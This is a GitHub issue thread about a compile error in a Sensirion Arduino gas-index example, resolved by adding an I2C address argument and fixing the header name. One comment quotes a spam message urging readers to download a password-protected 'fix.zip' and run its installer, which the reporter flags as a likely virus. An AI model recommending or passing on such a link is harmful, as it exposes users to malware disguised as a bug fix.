### ISSUE TITLE
Error while compiling exampleUsage.ino

### ISSUE THREAD

**Issue by stiamon77** [Sensirion/arduino-gas-index-algorithm#8]
Hi
Error while compiling exampleUsage.ino

```
C:\Users\stiam\AppData\Local\Temp\.arduinoIDE-unsaved2024726-13276-1kakfg3.42te\exampleUsage\exampleUsage.ino: In function 'void setup()':
C:\Users\stiam\AppData\Local\Temp\.arduinoIDE-unsaved2024726-13276-1kakfg3.42te\exampleUsage\exampleUsage.ino:59:16: error: no matching function for call to 'SensirionI2cSht4x::begin(TwoWire&)'
   59 |     sht4x.begin(Wire);
      |     ~~~~~~~~~~~^~~~~~
In file included from C:\Users\stiam\AppData\Local\Temp\.arduinoIDE-unsaved2024726-13276-1kakfg3.42te\exampleUsage\exampleUsage.ino:37:
c:\Users\stiam\Documents\Arduino\libraries\Sensirion_I2c_SHT4x\src/SensirionI2cSht4x.h:74:10: note: candidate: 'void SensirionI2cSht4x::begin(TwoWire&, uint8_t)'
   74 |     void begin(TwoWire& i2cBus, uint8_t i2cAddress);
      |          ^~~~~
c:\Users\stiam\Documents\Arduino\libraries\Sensirion_I2c_SHT4x\src/SensirionI2cSht4x.h:74:10: note:   candidate expects 2 arguments, 1 provided

exit status 1

Compilation error: no matching function for call to 'SensirionI2cSht4x::begin(TwoWire&)'
```

**Comment by stiamon77** [comment]
> Загрузите https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file пароль: changeme В меню установщика выберите «gcc».
I think this is a virus and I don't recommend downloading it.

**Comment by psachs** [comment]
Thanks for the report.
The latest update of the Arduino SHT4x library requires to also supply the I2C address to support all version of the SHT4x sensor.
You can compile the example by changing the line to

```c++
sht4x.begin(Wire, SHT40_I2C_ADDR_44);
```
We will update the examples within the next days to support the latest version of the SHT4x drivers.

**Comment by stiamon77** [comment]
There is also a small error in the library name.
exampleUsage.ino & exampleLowPowerUsage.ino
```
#include <SensirionI2CSht4x.h>

SensirionI2CSht4x sht4x;
```
it's correct like this:

```
#include <SensirionI2cSht4x.h>

SensirionI2cSht4x sht4x;
```

**Comment by LeonieFierz** [comment]
Example is fixed with Bugfix 3.2.3
